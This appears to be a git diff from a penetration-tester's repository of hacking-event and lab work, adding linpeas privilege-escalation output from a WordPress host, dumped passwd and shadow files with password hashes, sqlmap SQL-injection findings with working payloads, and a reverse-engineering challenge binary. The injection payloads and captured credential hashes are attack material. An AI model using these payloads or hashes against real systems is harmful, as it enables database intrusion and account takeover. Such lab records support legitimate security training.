+/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-widget.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/akismet/views/activate.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/config.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/connect-jp.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/enter.php +/var/www/yggdrasil/wp-content/plugins/akismet/views/get.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/akismet/wrapper.php +/var/www/yggdrasil/wp-content/plugins/hello.php +/var/www/yggdrasil/wp-content/plugins/index.php +/var/www/yggdrasil/wp-content/plugins/social-warfare +/var/www/yggdrasil/wp-content/plugins/social-warfare/README.md + +╔══════════╣ Interesting GROUP writable files (not in Home) (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files + Group www-data: +/var/www/yggdrasil +/var/www/yggdrasil/wp-content/upgrade +/var/www/yggdrasil/wp-content/plugins/social-warfare +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images/admin-options-page +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/fonts +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/src +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/src/block +/var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/dist +/var/www/yggdrasil/wp-content/plugins/social-warfare/languages +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/vendor +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/languages +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4 +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4 +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Vcs +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Theme +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/DebugBar +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/Puc/v4p4/Plugin +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/examples +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/utilities +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/widgets +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/options +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/frontend-output +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/buttons-panel +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/css +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/img +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/admin/assets/js +/var/www/yggdrasil/wp-content/plugins/social-warfare/lib/social-networks + + +╔══════════╣ Writable root-owned executables I can modify (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files +Writable root-owned executables Not Found + + + + ╔═════════════════════════╗ +════════════════════════════╣ Other Interesting Files ╠════════════════════════════ + ╚═════════════════════════╝ +╔══════════╣ .sh files in path (T1574.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path +/usr/bin/gettext.sh + +╔══════════╣ Executable files potentially added by user (limit 70) (T1083) + +╔══════════╣ Unexpected in /opt (usually empty) (T1083) +total 12 +drwxr-xr-x 3 root root 4096 May 6 11:17 . +drwxr-xr-x 22 root root 4096 May 6 11:17 .. +drwxr-xr-x 2 root root 4096 May 6 11:17 freya + +╔══════════╣ Unexpected in root (T1083) +/vmlinuz.old +/initrd.img +/initrd.img.old +/vmlinuz + +╔══════════╣ Modified interesting files in the last 5mins (limit 100) (T1083) +/tmp/out.txt +/tmp/cf31-probe-2649.py +/var/log/mail.info +/var/log/mail.log +/var/log/messages +/var/log/kern.log +/var/log/auth.log +/var/log/syslog +/var/log/daemon.log +/var/log/mail.warn +/var/log/user.log +/var/log/mail.err + +╔══════════╣ Syslog configuration (limit 50) (T1070.002) + + + +module(load="imuxsock") # provides support for local system logging +module(load="imklog") # provides kernel logging support + + + + + +$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat + +$FileOwner root +$FileGroup adm +$FileCreateMode 0640 +$DirCreateMode 0755 +$Umask 0022 + +$WorkDirectory /var/spool/rsyslog + +$IncludeConfig /etc/rsyslog.d/*.conf + + + +auth,authpriv.* /var/log/auth.log +*.*;auth,authpriv.none -/var/log/syslog +daemon.* -/var/log/daemon.log +kern.* -/var/log/kern.log +lpr.* -/var/log/lpr.log +mail.* -/var/log/mail.log +user.* -/var/log/user.log + +mail.info -/var/log/mail.info +mail.warn -/var/log/mail.warn +mail.err /var/log/mail.err + +*.=debug;\ + auth,authpriv.none;\ + news.none;mail.none -/var/log/debug +*.=info;*.=notice;*.=warn;\ + auth,authpriv.none;\ + cron,daemon.none;\ + mail,news.none -/var/log/messages + +*.emerg :omusrmsg:* +╔══════════╣ Auditd configuration (limit 50) (T1070.002) +auditd configuration Not Found +╔══════════╣ Log files with potentially weak perms (limit 50) (T1070.002) + 139613 124 -rw-r----- 1 root adm 119231 May 8 15:32 /var/log/mail.info + 131539 0 -rw-r----- 1 root adm 0 May 6 11:17 /var/log/apt/term.log + 139606 124 -rw-r----- 1 root adm 119231 May 8 15:32 /var/log/mail.log + 131104 44 -rw-r----- 1 root adm 44815 May 8 15:32 /var/log/messages + 131103 12 -rw-r----- 1 root adm 10030 May 8 13:29 /var/log/debug + 131102 52 -rw-r----- 1 root adm 50305 May 8 15:31 /var/log/kern.log + 131105 40 -rw-r----- 1 root adm 33653 May 8 15:32 /var/log/auth.log + 131101 196 -rw-r----- 1 root adm 198946 May 8 15:32 /var/log/syslog + 131106 16 -rw-r----- 1 root adm 14400 May 8 15:32 /var/log/daemon.log + 139614 32 -rw-r----- 1 root adm 26379 May 8 15:32 /var/log/mail.warn + 140307 8 -rw-r----- 1 root adm 4400 May 8 15:32 /var/log/user.log + 139617 32 -rw-r----- 1 root adm 26308 May 8 15:32 /var/log/mail.err + +╔══════════╣ Files inside /home/www-data (limit 20) (T1083) + +╔══════════╣ Files inside others home (limit 20) (T1552.001) +/home/baldur/token.txt +/home/baldur/Uploads/todo.txt +/home/user/.bashrc +/home/user/.bash_login +/home/user/.profile +/home/user/.bash_logout +/var/www/html/index.html +/var/www/yggdrasil/wp-config-sample.php +/var/www/yggdrasil/wp-cron.php +/var/www/yggdrasil/wp-mail.php +/var/www/yggdrasil/wp-activate.php +/var/www/yggdrasil/index.php +/var/www/yggdrasil/xmlrpc.php +/var/www/yggdrasil/readme.html +/var/www/yggdrasil/license.txt +/var/www/yggdrasil/wp-trackback.php +/var/www/yggdrasil/wp-comments-post.php +/var/www/yggdrasil/wp-load.php +/var/www/yggdrasil/wp-signup.php +/var/www/yggdrasil/wp-includes/class-wp-block-parser.php + +╔══════════╣ Searching installed mail applications (T1114.001) +sendmail +sendmail-msp +sendmail-mta + +╔══════════╣ Mails (limit 50) (T1114.001) + +╔══════════╣ Backup folders (T1552.001) +drwxr-xr-x 2 root root 4096 May 8 13:29 /var/backups +total 36 +-rw-r--r-- 1 root root 12923 May 6 11:17 apt.extended_states.0 +-rw-r--r-- 1 root root 918 May 6 11:17 apt.extended_states.1.gz +-rw-r--r-- 1 root root 923 May 6 11:17 apt.extended_states.2.gz +-rw-r--r-- 1 root root 917 May 6 11:17 apt.extended_states.3.gz +-rw-r--r-- 1 root root 921 May 6 11:17 apt.extended_states.4.gz +-rw-r--r-- 1 root root 889 May 6 11:17 apt.extended_states.5.gz + + +╔══════════╣ Backup files (limited 100) (T1552.001) +-rw-r--r-- 1 root root 744 May 6 11:17 /etc/apt/sources.list.bak +-rw-r--r-- 1 root root 20 May 6 11:17 /etc/vmware-tools/tools.conf.old +-rw-r--r-- 1 root root 673 May 6 11:17 /etc/xml/xml-core.xml.old +-rw-r--r-- 1 root root 610 May 6 11:17 /etc/xml/catalog.old +-rwxr-xr-x 1 root root 37515 May 6 11:17 /usr/bin/wsrep_sst_mariabackup +-rwxr-xr-x 1 root root 18160712 May 6 11:17 /usr/bin/mariabackup +-rwxr-xr-x 1 root root 41671 May 6 11:17 /usr/bin/wsrep_sst_xtrabackup-v2 +-rwxr-xr-x 1 root root 21273 May 6 11:17 /usr/bin/wsrep_sst_xtrabackup +-rw-r--r-- 1 root root 57 May 6 11:17 /usr/share/sendmail/cf/siteconfig/uucp.old.arpa.m4 +-rw-r--r-- 1 root root 7867 May 6 11:17 /usr/share/doc/telnet/README.telnet.old.gz +-rw-r--r-- 1 root root 331845 May 6 11:17 /usr/share/doc/manpages/Changes.old.gz +-rw-r--r-- 1 root root 303 May 6 11:17 /usr/share/doc/hdparm/changelog.old.gz +-rw-r--r-- 1 root root 357 May 6 11:17 /usr/share/man/man1/wsrep_sst_xtrabackup-v2.1.gz +-rw-r--r-- 1 root root 348 May 6 11:17 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz +-rw-r--r-- 1 root root 351 May 6 11:17 /usr/share/man/man1/wsrep_sst_xtrabackup.1.gz +-rw-r--r-- 1 root root 31664 May 6 11:17 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so +-rw-r--r-- 1 root root 159 May 6 11:17 /var/lib/sgml-base/supercatalog.old +-rw-r--r-- 1 root root 7896 May 6 11:17 /lib/modules/4.9.0-8-amd64/kernel/drivers/net/team/team_mode_activebackup.ko +-rw-r--r-- 1 root root 7896 May 6 11:17 /lib/modules/4.9.0-13-amd64/kernel/drivers/net/team/team_mode_activebackup.ko + +╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) (T1005) +Found /etc/mail/access.db: regular file, no read permission +Found /etc/mail/aliases.db: regular file, no read permission +Found /var/lib/apt/listchanges-old.db: Berkeley DB (Hash, version 9, native byte-order) +Found /var/lib/apt/listchanges.db: Berkeley DB (Hash, version 9, native byte-order) +Found /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/images/admin-options-page/Thumbs.db: Composite Document File V2 Document, Cannot read section info + + +╔══════════╣ Web files?(output limit) (T1005) +/var/www/: +total 16K +drwxr-xr-x 4 root root 4.0K May 6 11:17 . +drwxr-xr-x 12 root root 4.0K May 6 11:17 .. +drwxr-xr-x 2 root root 4.0K May 6 11:17 html +drwxrwxr-- 5 www-data www-data 4.0K May 6 11:17 yggdrasil + +/var/www/html: +total 20K +drwxr-xr-x 2 root root 4.0K May 6 11:17 . + +╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) (T1564.001) +-rw-r--r-- 1 user user 211 May 6 11:17 /home/user/.bash_login +-rw-r--r-- 1 user user 211 May 6 11:17 /home/user/.bash_logout +-rw-r--r-- 1 root root 220 May 6 11:17 /etc/skel/.bash_logout +-rw------- 1 root root 0 May 6 11:17 /etc/.pwd.lock +-rw-r--r-- 1 root root 629 May 6 11:17 /usr/share/wordpress/wp-content/plugins/akismet/.htaccess +-rw-r--r-- 1 www-data www-data 403 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.editorconfig +-rw-r--r-- 1 www-data www-data 101 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.eslintignore +-rw-r--r-- 1 www-data www-data 5408 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/assets/js/post-editor/.eslintrc.json +-rw-r--r-- 1 www-data www-data 271 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/social-warfare/lib/update-checker/.editorconfig +-rw-r--r-- 1 www-data www-data 629 May 6 11:17 /var/www/yggdrasil/wp-content/plugins/akismet/.htaccess +-rw-r--r-- 1 root root 0 May 8 13:29 /run/network/.ifstate.lock + +╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) (T1552.001) +-rw-r--r-- 1 www-data www-data 159157 May 8 15:32 /tmp/out.txt +-rwxr-xr-x 1 www-data www-data 1053413 May 6 11:23 /tmp/linpeas.sh +-rw-r--r-- 1 www-data www-data 4331 May 8 15:31 /tmp/cf31-probe-2649.py + +╔══════════╣ Searching passwords in config PHP files (T1552.001) +/usr/share/wordpress/wp-admin/setup-config.php: $pwd = trim( wp_unslash( $_POST[ 'pwd' ] ) ); +/usr/share/wordpress/wp-admin/setup-config.php: define('DB_PASSWORD', $pwd); +/usr/share/wordpress/wp-admin/setup-config.php: define('DB_USER', $uname); +/usr/share/wordpress/wp-config-sample.php:define('DB_PASSWORD', 'password_here'); +/usr/share/wordpress/wp-config-sample.php:define('DB_USER', 'username_here'); +/usr/share/wordpress/wp-config.php: define('DB_USER', 'wordpress'); +/var/www/yggdrasil/wp-admin/setup-config.php: $pwd = trim( wp_unslash( $_POST['pwd'] ) ); + +╔══════════╣ Searching *password* or *credential* files in home (limit 70) (T1552.001) +/bin/systemd-ask-password +/bin/systemd-tty-ask-password-agent +/etc/mail/tls/sendmail-common.key +/etc/pam.d/common-password +/usr/lib/grub/i386-pc/legacy_password_test.mod +/usr/lib/grub/i386-pc/password.mod +/usr/lib/grub/i386-pc/password_pbkdf2.mod +/usr/lib/x86_64-linux-gnu/mariadb18/plugin/mysql_clear_password.so +/usr/lib/x86_64-linux-gnu/mariadb18/plugin/simple_password_check.so +/usr/share/man/man1/systemd-ask-password.1.gz +/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz +/usr/share/man/man7/credentials.7.gz +/usr/share/man/man8/systemd-ask-password-console.path.8.gz +/usr/share/man/man8/systemd-ask-password-console.service.8.gz +/usr/share/man/man8/systemd-ask-password-wall.path.8.gz +/usr/share/man/man8/systemd-ask-password-wall.service.8.gz + #)There are more creds/passwds files in the previous parent folder + +/usr/share/pam/common-password.md5sums +/usr/share/wordpress/wp-admin/js/password-strength-meter.js +/usr/share/wordpress/wp-admin/js/password-strength-meter.min.js +/var/lib/pam/password +/var/www/yggdrasil/wp-admin/js/password-strength-meter.js +/var/www/yggdrasil/wp-admin/js/password-strength-meter.min.js + +╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs (T1552.001) + +╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs (T1083) + +╔══════════╣ Searching passwords inside logs (limit 70) (T1552.001) + +╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars (T1552.007,T1082) +APACHE_LOCK_DIR=/var/lock/apache2 +APACHE_LOG_DIR=/var/log/apache2 +APACHE_PID_FILE=/var/run/apache2/apache2.pid +APACHE_RUN_DIR=/var/run/apache2 +APACHE_RUN_GROUP=www-data +APACHE_RUN_USER=www-data +LANG=C +LANGUAGE=en_US:en +OLDPWD=/home +PWD=/ +PWD=/tmp +PWD=/var/www/yggdrasil/wp-admin +SHLVL=1 +SHLVL=2 +SHLVL=3 +SHLVL=4 +_=/bin/bash +_=/bin/cat +_=/bin/dd +_=/bin/grep +_=/bin/sed +_=/usr/bin/sort +_=/usr/bin/tee +_=/usr/bin/tr +_=/usr/bin/xxd + + + ╔════════════════╗ +════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ + ╚════════════════╝ +Regexes to search for API keys aren't activated, use param '-r' + + diff --git a/2026/usd_hackertag/freya/passwd b/2026/usd_hackertag/freya/passwd new file mode 100644 index 0000000..30dffbf --- /dev/null +++ b/2026/usd_hackertag/freya/passwd @@ -0,0 +1,31 @@ +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false +systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false +systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false +systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false +_apt:x:104:65534::/nonexistent:/bin/false +messagebus:x:105:109::/var/run/dbus:/bin/false +sshd:x:106:65534::/run/sshd:/usr/sbin/nologin +user:x:1000:1000:user,,,:/home/user:/bin/bash +mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false +ftp:x:108:112:ftp daemon,,,:/srv/ftp:/bin/false +smmta:x:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +baldur:x:1001:1001::/home/baldur: diff --git a/2026/usd_hackertag/freya/shadow b/2026/usd_hackertag/freya/shadow new file mode 100644 index 0000000..8aab2c8 --- /dev/null +++ b/2026/usd_hackertag/freya/shadow @@ -0,0 +1,31 @@ +root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:20579:0:99999:7::: +daemon:*:17569:0:99999:7::: +bin:*:17569:0:99999:7::: +sys:*:17569:0:99999:7::: +sync:*:17569:0:99999:7::: +games:*:17569:0:99999:7::: +man:*:17569:0:99999:7::: +lp:*:17569:0:99999:7::: +mail:*:17569:0:99999:7::: +news:*:17569:0:99999:7::: +uucp:*:17569:0:99999:7::: +proxy:*:17569:0:99999:7::: +www-data:*:17569:0:99999:7::: +backup:*:17569:0:99999:7::: +list:*:17569:0:99999:7::: +irc:*:17569:0:99999:7::: +gnats:*:17569:0:99999:7::: +nobody:*:17569:0:99999:7::: +systemd-timesync:*:17569:0:99999:7::: +systemd-network:*:17569:0:99999:7::: +systemd-resolve:*:17569:0:99999:7::: +systemd-bus-proxy:*:17569:0:99999:7::: +_apt:*:17569:0:99999:7::: +messagebus:*:17569:0:99999:7::: +sshd:*:17569:0:99999:7::: +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:17569:0:99999:7::: +mysql:!:20579:0:99999:7::: +ftp:*:20579:0:99999:7::: +smmta:*:20579:0:99999:7::: +smmsp:*:20579:0:99999:7::: +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:20579:0:99999:7::: diff --git a/2026/usd_hackertag/maxwell/notes.md b/2026/usd_hackertag/maxwell/notes.md new file mode 100644 index 0000000..b851335 --- /dev/null +++ b/2026/usd_hackertag/maxwell/notes.md @@ -0,0 +1,37 @@ +### sqlmap output + +sqlmap identified the following injection point(s) with a total of 5599 HTTP(s) requests: +--- +Parameter: product (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: product=-1399" OR 7840=7840-- CtiK + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: product=AUFB" AND (SELECT 9500 FROM (SELECT(SLEEP(5)))IiPL)-- CEjp + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: product=AUFB" UNION ALL SELECT NULL,CONCAT(0x716a626271,0x586a4443534a6c465264737464587149507541587a587945725a56796552544f5078416478545242,0x71717a7171)-- - +--- +do you want to exploit this SQL injection? [Y/n] Y +[17:26:46] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Debian 9 (stretch) +web application technology: Apache 2.4.25 +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +[17:26:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/cato/.local/share/sqlmap/output/results-05082026_0524pm.csv' + +available databases [4]: +[*] information_schema +[*] maindb +[*] mysql +[*] performance_schema + +Database: maindb +[1 table] ++----------+ +| products | ++----------+ + +current user: 'root@localhost' diff --git a/training/htb/challenges/rev/encrypted_data.txt b/training/htb/challenges/rev/encrypted_data.txt new file mode 100644 index 0000000..b912934 --- /dev/null +++ b/training/htb/challenges/rev/encrypted_data.txt @@ -0,0 +1 @@ +09071148207302682C6762023E367D1A1E351F072A1D3C0B712562577E30133B71072E diff --git a/training/htb/challenges/rev/ircware b/training/htb/challenges/rev/ircware new file mode 100644 index 0000000000000000000000000000000000000000..7bdd45f447607d04a151bfc744ce8b7038c89e17 GIT binary patch literal 5368 zcmeHLUu=_A6u;}%b!?Pw!Xi-y-%uWywA+NvxwW%n4DN7lr9=KK3hTOWbY$#L`_&B- z{$OY#pwyvQ}-d z1^aDJgEz)dk95=NbRP2malk%4bXzrF^8%6=F>)St<}6WItPWgTjK|i@niXb(am;)R zRuwQ3Euc0!ZaEPIeI8q0*a0+@{vDWjtc=Lhg4{&pD5~tjX$q#9Ut$h`OYnnT;<2?z zV9_sPMj{%Ek%x`jVb53@uz1ADVeLNxb?El5a&_-F@bJwGg&+dOkOgzO!{5!G<;klP zCNochem-A&hu{5yCojh^GVuS|V&T6NiUg7KXz_0F{VDDQw*1(HSgpM=mg`{Js}8qj znDOs`2!2Pih#6t_+#WtUWjTHW5=PP27;(h>BY-Z_8j#(gvj3K+bEt7u6xLgh6czCD(EA{zp1w{BZtUy?c{K{({aB~`Lc0x765)TRt-xS@W%yV-n zAp#1(vq*aiqkBAG%cv`Gc`xrWk6rTowd_|yG4CqX;UuMcw zAX9-%1u_-LR3KA0*ihH?%Z0Jg@Wwd_&%Vx)%?7?8UZ54{?+VrA(=jVz#xlsYQ7rsQLn`27fJE zl`_`2tD(`oy{WaORH@(C>ew(9f*CRKoQ>pE{taU2KtL zdDQ)?FP*WezfUa{r*hQrsDq)NfErW=yusj5f1ry!A`KUrintOq_}A_0G}KicdTgbA zm8q=6Q82isbLZiTrL}`58+%gfx;;%hUTE7wX(%-=by)Q&jGoKi<=wsBee6+b?%BF^ z{ie1CH%l$@9_Se3e2C*z_~v|;EuAo1&>z$SnzxhLdipdqFu-j4`a(9p7iwqgI@lLH zctA%jz-*d2tTCJF-`gGV9#93}d!WY$3$Ny7w$5OX-2QjO_ZNEt4<9(_-iGdT=-x(` z-tQlxv2fTcWKaEcUN#z@=W$TKQ8|fT3bNml$$qk@{u`I}v_I*Sy>JRs3H&ezvZwx> zmiF}AF-ByOJ@MB751$U%Q@_tid+Kjc5ksCu1{Y9x?w!Xh+CP!&67u`^UV=1;MK#aB2T?DT zg7@|L{eI`PS!eIH*Is+=wIAoqUVE?8)*P-S8YXqUY}|F+fA-i{K5>hSD8vz5JpvIo z?#Ar~O$9DaN2kT^PK*7|MWiM{7Wm&hL4~rYQPUmnB&gnXu#2cqX9<)js_eJI2w3U8YrNSCBe=_bgVDd z8|#Z!hkcY(8K?cUVp;`n>L{co!QMTwSRxwV)iyjDizgFBR`QXES=7&Uzw7$x%kuu9 z9l4l}Pi8+ns_|P3P0@Dp(R1zq1q96@(vFAR&qz*;DcX9rNJFL@GfC~KW6BETh&`2tcR<=#=@ecsJGdmb2PJLu>*>|l z=FaPpYV@$&o|N4E9zD0pU|2=ezxEW=F~mf=c2t)_)fQC^;jbNsSkf*E`Z)Yq34iuE zo%G{9p3feBZ0~7 zTiRMSPY}1jnJ=R^xJxIDCPeF_wO0_oD;t-d@6Gb+nlIZI3O8+RZrQY%6GBERYUE=5 zxm>PQlb_>Vx2`M~zk4$lNEJt*4DCsD4O1YXOYONUPXGMVUwtLj=MQdT0=eAo%`}I| zyN#hXhgzwO@VXDM80lJ_uI}y{o&18S=QKYyK$EskC%K1ony+z)rh@rCa&KS~{+WPZ z4vz$Zt*k_UA~#9G*$8Ui%*x85htVQag@uI>*NuWf<6>~yf|2%@3I<8$f{`EvPuJi| zFS(8CAkk*p2r*h2HZp)vq@ia1+!LDak89)_uK{NAMVjU-9jlQ)4*C$XDiM_?gtC>k zF-w5Ij%BNjwd6LNBMqr5bh zt#st;sE9z}64n(r@-?QA&Ck08ny9xs^I zwQN@a6RFmz$%8_hJW40;)V1Y@DevT+cs$_u{>eMt6wv)SGYNGNdKRl^LN7lKkO8sD z-%!Gcm1D|3d1r1fRWPq!i6m4c!I8YfJg|NB37x{j5~@)J=VXxZBVIj^ zAA-B4xF#;T9r-^ZGT)2bnBz`WQq zmE_IN^%zw01*qgPu*Xuz$;X&|e!)ya{p4eoN^Tb=JZ7lm9wR0yc`WyKXaT%f?#FWP zQ4yBqvAi!BDq(3JGgQK*<|&m(!37y4e8Qiul1GvM36U8c=@feF$se)IfwO1IOecS7 zs^qJtN`56Od5MlA+pDaS!dbbV!@GsH{5a(yfC7q%5a1Guif7X5Ol$U(M_Cb^M|Bm^ z3rAToxaU4f6&xkV&r#?`qEHU*dB+XyKrlp=dL;c+q38!;mZ3P4yk5T{FQ%bWOPE1E z)0QlmDX;rEZC7$w6i#Csjkc5(M}u%s#eq1o;r^cYguLI z;VtJmt$v|9??^5>*n%E*?@PW8%|760T+DQ^AEjY7T6p!yCbUGacTF@!Kjl zl#0lIpj4F9lA3OFzpIJ@^DCuFfd4V(+ilE$VKK)MF-Q*hA7kEYWB!I>K1Y-!56!i@ ztj=FX8C1iUGb8l<7Gf)2eGj6F|8p~ehvBB39Y!9fvb%n8ku1S!&MBVLSYUW z`CB=xr;>C<;=zlmNnXbxmPgZ8n?hRBdVOb1&O$wryMcj}n37zi5P3XWD_z1;0L)NE zwr`1rUCeLDEXU${1Zr3y)SmC?+$)UE9cFSViF|FeLsYO6Z{Mv1s56*Rg5R$0ysw$+ z?q+I$G@)~B>dyNitGnNLrGvT=gt{4aFkHpJP&Y!tCkNU8cWvcJWH?&6u5x>{chAURqIXX;xMO5+JQ`07CLg^w8Qk*dLnAwyj)p-(YeuHlnbDeUWOA zRrd}>5{Y;$HVlHkXrebhILbs|j(ow5W@>N~4k3dik&MKXtbML?ZB6a!>Y6pxHMPtg z&5*(aY2XJFiLq#3x3ElQ2-Y;NtFK$Pifd!kxI1}Zl)17(`?#oRBnd67T3(69Kz_SM z)>hXyt!}QaZ47U!ZdnUr{tbq_tt~q@?rc~CgsGz0%6qF-xNf=G4r{B|G_77+y{fsk zsk**pMyYG+|LaO^XkJ~ty0NjbdQC%mso`zhrT%N`x~i@@T;0^rxT?Bw)vQwgvupeI z>)w9d^2$BYNFR6XYb#{{ai3Xr-F2zwU|Yf%gsu=Tw9;$S(=q%CkZVc{8Fv+5plU1xlMuz}#B59$IvgvX_AFTk)qGCWV zy;yH_BT9Y8OA7SKbt z0lH}~po=;HbvheRqu1v%pBLschwsg2X&;!+Jnsfxr@sNzC?PaE1iw`%!@#(y63|5& zpiV!Z$CTdyB>Ln$=JU4*>vUM~gMzJ)$7QVr#!Y2_E;?1tlurR_^bjBp7?d-I zV}id{@Dagp#D+2){3vG*D}ljwazGcoQpOw}1JvjNK%x(oF^6{wJ|Xza1%G}Sb68!* z9L_G|LmpYcyXaSQnZu)i8hsKFrO#y!*9v|>@LL4GaxQZ?XD)M?4~(1sIEOj>6i}xx z18Q^^AkpDD%poTDw+TKh_^LU~p<)hmC;-MyCrX*acL8yR5p(!* z5%c`0gx@dWn-GRnfNt6W=%P)4I;{oNXc-`3A3o>Gk?sJJa5Ug(z|nxC0Y?Ll1{@7I8gMk=Xu#2cqk+sC@Y8Pdl*dAxOU3F*pAhy0&c#n- zKkYPA`3y)l*^hqssmn~9k(J%d_^HiI<*a_%Xyo-iq*1Y-)|;%3;S`CVYRzJo;zXRE zmZe9}GFib3O?z9%j-5E1#%?zTqRDtg*U`MgIG!^nb1a}^MjMqcC>~f5!ABW8d=zOP z+}+z1TjQtSo5=w;l9^miA4-u4H_0WFWXbvU@1XdYV?;FNVt+OI#cE zf#Kb;A%j|ER0n~X_p@ecE+4fUGV1hnM-fGb`nv~4#=7@J5_`IP_e2Iqbox<8aXNnY zSnu9wQl}?6O41VsNBW}sqY12D&199>GuV$D-@>8Cv?6v7CWj-5z1<`GV(~s?{Q69m 